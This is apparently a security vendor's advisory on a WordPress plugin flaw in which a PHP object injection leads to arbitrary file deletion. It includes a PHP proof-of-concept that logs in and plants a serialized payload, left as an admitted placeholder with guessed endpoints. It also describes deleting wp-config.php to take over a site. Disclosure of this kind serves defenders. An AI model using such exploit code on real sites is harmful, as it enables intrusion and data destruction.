Published : June 29, 2026

CVE-2026-12240: Export User Data <= 2.2.6 Authenticated (Subscriber+) PHP Object Injection to Arbitrary File Deletion via display_name Field PoC, Patch Analysis & Rule

Severity High (CVSS 8.0)
CWE 502
Vulnerable Version 2.2.6
Patched Version
Disclosed June 28, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-12240 (metadata-based):
This vulnerability affects the Export User Data plugin for WordPress up to version 2.2.6. It allows authenticated attackers with subscriber-level access and above to trigger arbitrary file deletion through PHP object injection. The CVSS score is 8 (High).

The root cause is a deserialization of untrusted data (CWE-502) combined with insufficient file path validation. The plugin’s export functionality unserializes user data without proper sanitization, allowing injection of a crafted PHP object. Specifically, the display_name field stores a serialized XLSXWriter object payload. When an administrator triggers a user data export, the plugin unserializes this data, leading to arbitrary file deletion. Atomic Edge analysis infers this from the CWE classification, vulnerability description, and the mention of XLSXWriter (a PHP spreadsheet library). No source code is available to confirm the exact unserialize call or the insufficient path validation logic.

Exploitation requires two conditions: (1) a subscriber-level (or higher) attacker stores a crafted serialized XLSXWriter object payload in their display_name field, and (2) an administrator triggers a user data export. The attacker registers or edits their profile to set the display_name to a serialized PHP object that, when unserialized, controls the file path to delete (e.g., wp-config.php). The export action likely calls a WordPress AJAX endpoint or admin page. Atomic Edge analysis infers the attack vector from the description; no specific endpoint is confirmed without source code.

Remediation requires the developer to validate and sanitize file paths before passing them to any deletion function, and to avoid unserializing untrusted user input. The fix should use a whitelist of allowed file paths or PHP’s realpath() to resolve and restrict deletions. Additionally, the plugin should only allow trusted (administrator) users to trigger exports with unmodified data, or encode/validate display_name before serialization.

The impact is severe. Successful exploitation leads to arbitrary file deletion, which can delete critical files like wp-config.php. This allows an attacker to perform remote code execution (RCE) by, for example, deleting wp-config.php to trigger WordPress’s setup wizard and gain administrative access. The vulnerability requires user interaction (an admin export) and authenticated access, reducing its accessibility but still posing a high risk.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-12240 - Export User Data <= 2.2.6 - PHP Object Injection to Arbitrary File Deletion

// This PoC assumes:
// - The attacker has subscriber-level credentials with CSRF nonce.
// - The plugin stores user display_name fields and later unserializes them during export.
// - The export endpoint is /wp-admin/admin-ajax.php?action=export_user_data_export (inferred from plugin slug).
// - The target file to delete is wp-config.php (common for RCE).

$target_url = 'http://example.com'; // Change this to the target WordPress URL
$username = 'attacker';            // Subscriber-level account
$password = 'attacker_password';

// Step 1: Craft a serialized PHP object payload for XLSXWriter that exploits file deletion.
// In a real exploit, this would be a custom class with a __destruct() or __wakeup() method.
// Since no source code is available, we use a generic serialized object as a placeholder.
// The payload should cause arbitrary file deletion; here we simulate a generic payload.
$payload = 'O:10:"XLSXWriter":0:{}'; // Placeholder - real payload would target file deletion.

// Step 2: Log in to get cookies and nonce.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Update the user's display_name with the serialized payload.
// This assumes the plugin uses WordPress's update_user_meta or similar.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$update_action = 'update_user_profile'; // Inferred from WordPress user edit.
$nonce = 'inferred_nonce'; // In practice, obtain from profile edit page.

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'action=' . urlencode($update_action) . '&_wpnonce=' . urlencode($nonce) . '&display_name=' . urlencode($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

// Step 4: Trigger export (requires admin action - this PoC only sets up the payload).
// Successful exploitation requires an administrator to export user data.
echo "Payload stored. An administrator must now trigger the user data export to execute file deletion.n";

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School